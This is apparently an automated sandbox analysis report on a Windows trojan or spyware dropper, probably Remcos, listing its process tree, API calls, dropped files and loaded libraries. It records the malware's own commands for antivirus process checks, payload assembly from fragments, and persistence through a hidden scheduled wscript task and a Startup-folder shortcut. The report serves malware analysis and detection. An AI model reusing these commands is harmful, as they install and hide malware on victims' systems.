    Source: Yara matchFile source: C:\ProgramData\remcos\registros.dat, type: DROPPED

    System Summary

    barindex
    Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
    Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.js"
    Source: C:\Users\user\AppData\Local\Temp\33988\Paintball.comProcess Stats: CPU usage > 49%
    Source: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scrCode function: 19_2_00FF42D5: CreateFileW,DeviceIoControl,CloseHandle,19_2_00FF42D5
    Source: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scrCode function: 19_2_00FE8F2E _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,19_2_00FE8F2E
    Source: C:\Users\user\Desktop\sXpIsdpkzy.exeCode function: 0_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,0_2_004038AF
    Source: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scrCode function: 19_2_00FF5778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,19_2_00FF5778
    Source: C:\Users\user\Desktop\sXpIsdpkzy.exeFile created: C:\Windows\InternshipWantJump to behavior
    Source: C:\Users\user\Desktop\sXpIsdpkzy.exeFile created: C:\Windows\JpgCelebrityJump to behavior
    Source: C:\Users\user\Desktop\sXpIsdpkzy.exeFile created: C:\Windows\JpegSuseJump to behavior
    Source: C:\Users\user\Desktop\sXpIsdpkzy.exeFile created: C:\Windows\GovernmentalPoetryJump to behavior
    Source: C:\Users\user\Desktop\sXpIsdpkzy.exeFile created: C:\Windows\MoBelongsJump to behavior
    Source: C:\Users\user\Desktop\sXpIsdpkzy.exeCode function: 0_2_0040737E0_2_0040737E
    Source: C:\Users\user\Desktop\sXpIsdpkzy.exeCode function: 0_2_00406EFE0_2_00406EFE
    Source: C:\Users\user\Desktop\sXpIsdpkzy.exeCode function: 0_2_004079A20_2_004079A2
    Source: C:\Users\user\Desktop\sXpIsdpkzy.exeCode function: 0_2_004049A80_2_004049A8
    Source: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scrCode function: 19_2_00F9B02019_2_00F9B020
    Source: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scrCode function: 19_2_00F994E019_2_00F994E0
    Source: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scrCode function: 19_2_00F99C8019_2_00F99C80
    Source: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scrCode function: 19_2_00FB23F519_2_00FB23F5
    Source: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scrCode function: 19_2_0101840019_2_01018400
    Source: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scrCode function: 19_2_00FC650219_2_00FC6502
    Source: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scrCode function: 19_2_00F9E6F019_2_00F9E6F0
    Source: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scrCode function: 19_2_00FC265E19_2_00FC265E
    Source: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scrCode function: 19_2_00FB282A19_2_00FB282A
    Source: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scrCode function: 19_2_00FC89BF19_2_00FC89BF
    Source: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scrCode function: 19_2_00FC6A7419_2_00FC6A74
    Source: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scrCode function: 19_2_00FA0BE019_2_00FA0BE0
    Source: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scrCode function: 19_2_01010A3A19_2_01010A3A
    Source: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scrCode function: 19_2_00FEEDB219_2_00FEEDB2
    Source: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scrCode function: 19_2_00FBCD5119_2_00FBCD51
    Source: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scrCode function: 19_2_00FF8E4419_2_00FF8E44
    Source: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scrCode function: 19_2_00FC6FE619_2_00FC6FE6
    Source: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scrCode function: 19_2_01010EB719_2_01010EB7
    Source: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scrCode function: 19_2_00FB33B719_2_00FB33B7
    Source: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scrCode function: 19_2_00FAD45D19_2_00FAD45D
    Source: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scrCode function: 19_2_00FBF40919_2_00FBF409
    Source: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scrCode function: 19_2_00FB16B419_2_00FB16B4
    Source: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scrCode function: 19_2_00F9F6A019_2_00F9F6A0
    Source: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scrCode function: 19_2_00F9166319_2_00F91663
    Source: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scrCode function: 19_2_00FAF62819_2_00FAF628
    Source: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scrCode function: 19_2_00FB78C319_2_00FB78C3
    Source: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scrCode function: 19_2_00FB1BA819_2_00FB1BA8
    Source: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scrCode function: 19_2_00FBDBA519_2_00FBDBA5
    Source: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scrCode function: 19_2_00FC9CE519_2_00FC9CE5
    Source: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scrCode function: 19_2_00FADD2819_2_00FADD28
    Source: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scrCode function: 19_2_00FBBFD619_2_00FBBFD6
    Source: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scrCode function: 19_2_00FB1FC019_2_00FB1FC0
    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scr 865347471135BB5459AD0E647E75A14AD91424B6F13A5C05D9ECD9183A8A1CF4
    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\33988\Paintball.com 865347471135BB5459AD0E647E75A14AD91424B6F13A5C05D9ECD9183A8A1CF4
    Source: C:\Users\user\Desktop\sXpIsdpkzy.exeCode function: String function: 004062CF appears 58 times
    Source: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scrCode function: String function: 00FB8B30 appears 42 times
    Source: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scrCode function: String function: 00FA1A36 appears 34 times
    Source: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scrCode function: String function: 00FB0D17 appears 70 times
    Source: sXpIsdpkzy.exeStatic PE information: invalid certificate
    Source: sXpIsdpkzy.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@36/25@4/2
    Source: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scrCode function: 19_2_00FFA6AD GetLastError,FormatMessageW,19_2_00FFA6AD
    Source: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scrCode function: 19_2_00FE8DE9 AdjustTokenPrivileges,CloseHandle,19_2_00FE8DE9
    Source: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scrCode function: 19_2_00FE9399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,19_2_00FE9399
    Source: C:\Users\user\Desktop\sXpIsdpkzy.exeCode function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044D1
    Source: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scrCode function: 19_2_00FF4148 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,19_2_00FF4148
    Source: C:\Users\user\Desktop\sXpIsdpkzy.exeCode function: 0_2_004024FB CoCreateInstance,0_2_004024FB
    Source: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scrCode function: 19_2_00FF443D __swprintf,__swprintf,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,19_2_00FF443D
    Source: C:\Users\user\AppData\Local\Temp\33988\Paintball.comFile created: C:\Users\user\AppData\Local\Secure360 InnovationsJump to behavior
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4036:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6368:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1624:120:WilError_03
    Source: C:\Users\user\Desktop\sXpIsdpkzy.exeFile created: C:\Users\user\AppData\Local\Temp\nslA6F9.tmpJump to behavior
    Source: sXpIsdpkzy.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
    Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
    Source: C:\Users\user\Desktop\sXpIsdpkzy.exeFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Users\user\Desktop\sXpIsdpkzy.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: sXpIsdpkzy.exeReversingLabs: Detection: 52%
    Source: C:\Users\user\Desktop\sXpIsdpkzy.exeFile read: C:\Users\user\Desktop\sXpIsdpkzy.exeJump to behavior
    Source: unknownProcess created: C:\Users\user\Desktop\sXpIsdpkzy.exe "C:\Users\user\Desktop\sXpIsdpkzy.exe"
    Source: C:\Users\user\Desktop\sXpIsdpkzy.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Hazards Hazards.cmd && Hazards.cmd
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 33988
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "EmergencyAdaptedResearchOrdinaryHeatherSuspendedHospitalsScanner" Cancer
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Oe + ..\Increases + ..\Independently + ..\Devon + ..\Hotels + ..\Automobile + ..\Albany + ..\Georgia + ..\Guess + ..\Funeral w
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\33988\Paintball.com Paintball.com w
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
    Source: C:\Users\user\AppData\Local\Temp\33988\Paintball.comProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "Mon" /tr "wscript //B 'C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.js'" /sc minute /mo 5 /F
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Mon" /tr "wscript //B 'C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.js'" /sc minute /mo 5 /F
    Source: C:\Users\user\AppData\Local\Temp\33988\Paintball.comProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Securify360.url" & echo URL="C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Securify360.url" & exit
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.js"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scr "C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scr" "C:\Users\user\AppData\Local\Secure360 Innovations\V"
    Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.js"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scr "C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scr" "C:\Users\user\AppData\Local\Secure360 Innovations\V"
    Source: C:\Users\user\Desktop\sXpIsdpkzy.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Hazards Hazards.cmd && Hazards.cmdJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc" Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 33988Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "EmergencyAdaptedResearchOrdinaryHeatherSuspendedHospitalsScanner" Cancer Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Oe + ..\Increases + ..\Independently + ..\Devon + ..\Hotels + ..\Automobile + ..\Albany + ..\Georgia + ..\Guess + ..\Funeral wJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\33988\Paintball.com Paintball.com wJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\33988\Paintball.comProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "Mon" /tr "wscript //B 'C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.js'" /sc minute /mo 5 /FJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\33988\Paintball.comProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Securify360.url" & echo URL="C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Securify360.url" & exitJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Mon" /tr "wscript //B 'C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.js'" /sc minute /mo 5 /FJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scr "C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scr" "C:\Users\user\AppData\Local\Secure360 Innovations\V"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scr "C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scr" "C:\Users\user\AppData\Local\Secure360 Innovations\V"Jump to behavior
    Source: C:\Users\user\Desktop\sXpIsdpkzy.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\sXpIsdpkzy.exeSection loaded: version.dllJump to behavior
    Source: C:\Users\user\Desktop\sXpIsdpkzy.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\Desktop\sXpIsdpkzy.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\Desktop\sXpIsdpkzy.exeSection loaded: shfolder.dllJump to behavior
    Source: C:\Users\user\Desktop\sXpIsdpkzy.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\Desktop\sXpIsdpkzy.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\Desktop\sXpIsdpkzy.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Users\user\Desktop\sXpIsdpkzy.exeSection loaded: riched20.dllJump to behavior
    Source: C:\Users\user\Desktop\sXpIsdpkzy.exeSection loaded: usp10.dllJump to behavior
    Source: C:\Users\user\Desktop\sXpIsdpkzy.exeSection loaded: msls31.dllJump to behavior
    Source: C:\Users\user\Desktop\sXpIsdpkzy.exeSection loaded: textinputframework.dllJump to behavior
    Source: C:\Users\user\Desktop\sXpIsdpkzy.exeSection loaded: coreuicomponents.dllJump to behavior
    Source: C:\Users\user\Desktop\sXpIsdpkzy.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Users\user\Desktop\sXpIsdpkzy.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Users\user\Desktop\sXpIsdpkzy.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\sXpIsdpkzy.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\sXpIsdpkzy.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\sXpIsdpkzy.exeSection loaded: textshaping.dllJump to behavior
    Source: C:\Users\user\Desktop\sXpIsdpkzy.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\Desktop\sXpIsdpkzy.exeSection loaded: edputil.dllJump to behavior
    Source: C:\Users\user\Desktop\sXpIsdpkzy.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Users\user\Desktop\sXpIsdpkzy.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Users\user\Desktop\sXpIsdpkzy.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Users\user\Desktop\sXpIsdpkzy.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Users\user\Desktop\sXpIsdpkzy.exeSection loaded: windows.staterepositoryps.dllJump to behavior
    Source: C:\Users\user\Desktop\sXpIsdpkzy.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\Desktop\sXpIsdpkzy.exeSection loaded: appresolver.dllJump to behavior
    Source: C:\Users\user\Desktop\sXpIsdpkzy.exeSection loaded: bcp47langs.dllJump to behavior
    Source: C:\Users\user\Desktop\sXpIsdpkzy.exeSection loaded: slc.dllJump to behavior
    Source: C:\Users\user\Desktop\sXpIsdpkzy.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Users\user\Desktop\sXpIsdpkzy.exeSection loaded: sppc.dllJump to behavior
    Source: C:\Users\user\Desktop\sXpIsdpkzy.exeSection loaded: onecorecommonproxystub.dllJump to behavior
    Source: C:\Users\user\Desktop\sXpIsdpkzy.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\33988\Paintball.comSection loaded: wsock32.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\33988\Paintball.comSection loaded: version.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\33988\Paintball.comSection loaded: winmm.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\33988\Paintball.comSection loaded: mpr.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\33988\Paintball.comSection loaded: wininet.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\33988\Paintball.comSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\33988\Paintball.comSection loaded: userenv.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\33988\Paintball.comSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\33988\Paintball.comSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\33988\Paintball.comSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\33988\Paintball.comSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\33988\Paintball.comSection loaded: ntmarta.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\33988\Paintball.comSection loaded: napinsp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\33988\Paintball.comSection loaded: pnrpnsp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\33988\Paintball.comSection loaded: wshbth.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\33988\Paintball.comSection loaded: nlaapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\33988\Paintball.comSection loaded: mswsock.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\33988\Paintball.comSection loaded: dnsapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\33988\Paintball.comSection loaded: winrnr.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\33988\Paintball.comSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\33988\Paintball.comSection loaded: urlmon.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\33988\Paintball.comSection loaded: iertutil.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\33988\Paintball.comSection loaded: srvcli.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\33988\Paintball.comSection loaded: netutils.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\33988\Paintball.comSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\33988\Paintball.comSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\33988\Paintball.comSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\33988\Paintball.comSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\33988\Paintball.comSection loaded: winhttp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\33988\Paintball.comSection loaded: winnsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scrSection loaded: wsock32.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scrSection loaded: version.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Secure360 Innovations\Securify360.scrSection loaded: winmm.dllJump to behavior
